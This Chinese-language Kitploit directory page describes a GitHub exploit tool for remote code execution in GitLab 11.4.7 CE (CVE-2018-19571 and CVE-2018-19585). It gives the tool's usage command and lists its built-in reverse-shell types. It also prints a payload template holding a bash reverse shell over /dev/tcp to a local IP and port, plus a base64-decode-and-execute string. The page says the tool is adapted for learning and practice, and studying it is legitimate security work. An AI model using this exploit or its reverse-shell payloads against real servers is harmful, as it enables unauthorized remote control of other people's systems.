Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
gitlab-RCE-11.4.7 — GitLab 11.4.7 远程代码执行漏洞利用,包含多种反向Shell。CVE-2018-19571 + CVE-2018-19585 | Kitploit
工具/GitHubGitHub/algafix/gitlab-rce-11.4.7
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

GitLab 11.4.7 远程代码执行漏洞利用,包含多种反向Shell。CVE-2018-19571 + CVE-2018-19585

查看仓库
335年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

gitlab-RCE-11.4.7

GitLab 11.4.7 CE RCE 漏洞利用工具,支持多种反弹 shell。
CVE-2018-19571:https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585:https://nvd.nist.gov/vuln/detail/CVE-2018-19585

本版本基于 Sam Redmond 和 Tam Lai Yin 的版本进行修改,用于学习和练习。

使用方法

本工具用 python3 编写,符合宇宙真理。

依赖:

root@kitploit:~
pip3 install requests

使用:

root@kitploit:~
python3 rce_script.py -u <用户名> -p <密码> -g <URL:端口> -l <本地IP> -P <本地端口> [<shell类型>]

默认使用带 -e 选项的 netcat shell。

内置 shell

当前内置的 shell 类型:

  • nc_e
    • 带 -e 选项的 Netcat。
  • bash:
    • 使用绝对路径执行 Bash。
  • perl:
    • 从 $PATH 中执行 Perl。
  • python3:
    • 从 $PATH 中执行 Python3。
  • ruby:
    • 从 $PATH 中执行 Ruby。
  • php:
    • 从 $PATH 中执行 PHP。注意:在 GitLab Docker 中通常无法正常工作。

添加自定义 shell

某些 shell 包含与请求编码不兼容的字符,因此它们被编码为 Base64,然后在目标机器上解码并执行。

如果要添加自己的 shell,请在 payloads_dict 结构中添加一个值。

您需要定义以下内容:

root@kitploit:~
'bash': {
    # If the raw_payload can be executed withoud encoding
    'safe': False,
    # Payload, must contain the references for the local_ip and for the local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # How to execute the payload if safe is False. Must conatin the reference for payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

免责声明

HTML 解析方式相当硬编码,可能会轻易失效。

下载工具